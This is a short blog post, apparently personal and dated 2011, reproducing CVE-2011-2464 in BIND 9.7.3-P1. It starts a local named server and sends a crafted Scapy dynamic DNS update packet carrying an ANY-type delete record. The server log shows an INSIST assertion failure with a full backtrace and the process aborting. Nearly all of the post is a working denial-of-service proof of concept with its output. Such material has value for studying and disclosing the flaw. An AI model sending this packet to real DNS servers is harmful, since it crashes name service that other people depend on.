Tuesday, 26 July 2011

cve-2011-2464

  • Start bind-9.7.3-P1
$ bind-9.7.3-P1/bin/named/named  -g -c named.conf -4
26-Jul-2011 00:19:17.201 starting BIND 9.7.3-P1 -g -c named.conf -4
...
26-Jul-2011 00:19:17.212 listening on IPv4 interface lo, 127.0.0.1#10053...
  • Dynamic DNS delete message with update section type "ANY"
$ sudo scapy
[sudo] password for richard:
Welcome to Scapy (2.1.0)
>>> conf.L3socket=L3RawSocket
>>> sr1(IP(dst="127.0.0.1")/UDP(dport=10053)/DNS(opcode=5, qd=[DNSQR(qname="example.com", qtype="SOA")], ns=[DNSRR(rrname="foo.example.com", type="ANY", rclass="ANY", rdata="", ttl=0)]), verbose=1, timeout=5)
Begin emission:
Finished to send 1 packets.

Received 8 packets, got 0 answers, remaining 1 packets
  •  Oh dear :(
...
26-Jul-2011 00:24:42.740 ncache.c:343: INSIST(remaining.length >= 5) failed, back trace
26-Jul-2011 00:24:42.740 #0 0x805ac28 in assertion_failed()+0x48
26-Jul-2011 00:24:42.740 #1 0x81bfd37 in isc_assertion_failed()+0x27
26-Jul-2011 00:24:42.740 #2 0x80e093e in dns_ncache_towire()+0x57e
26-Jul-2011 00:24:42.740 #3 0x813f05f in towiresorted.clone.0()+0xcf
26-Jul-2011 00:24:42.740 #4 0x80d6b76 in dns_message_rendersection()+0x1a6
26-Jul-2011 00:24:42.740 #5 0x804ffcc in ns_client_send()+0x2bc
26-Jul-2011 00:24:42.740 #6 0x8081b7a in respond()+0xaa
26-Jul-2011 00:24:42.740 #7 0x8086ef9 in ns_update_start()+0x79
26-Jul-2011 00:24:42.740 #8 0x8051c98 in client_request()+0x1118
26-Jul-2011 00:24:42.740 #9 0x81dd0f9 in isc__taskmgr_dispatch()+0x149
26-Jul-2011 00:24:42.740 #10 0x81dffc2 in evloop()+0x92
26-Jul-2011 00:24:42.740 #11 0x81e026f in isc__app_ctxrun()+0x7f
26-Jul-2011 00:24:42.740 #12 0x81e07f2 in isc__app_run()+0x12
26-Jul-2011 00:24:42.740 #13 0x805be62 in main()+0xd32
26-Jul-2011 00:24:42.740 #14 0x272e37 in ??
26-Jul-2011 00:24:42.740 #15 0x804bab1 in _start()+0x21
26-Jul-2011 00:24:42.740 exiting (due to assertion failure)
Aborted (core dumped)
Further reading:

No comments:

Post a Comment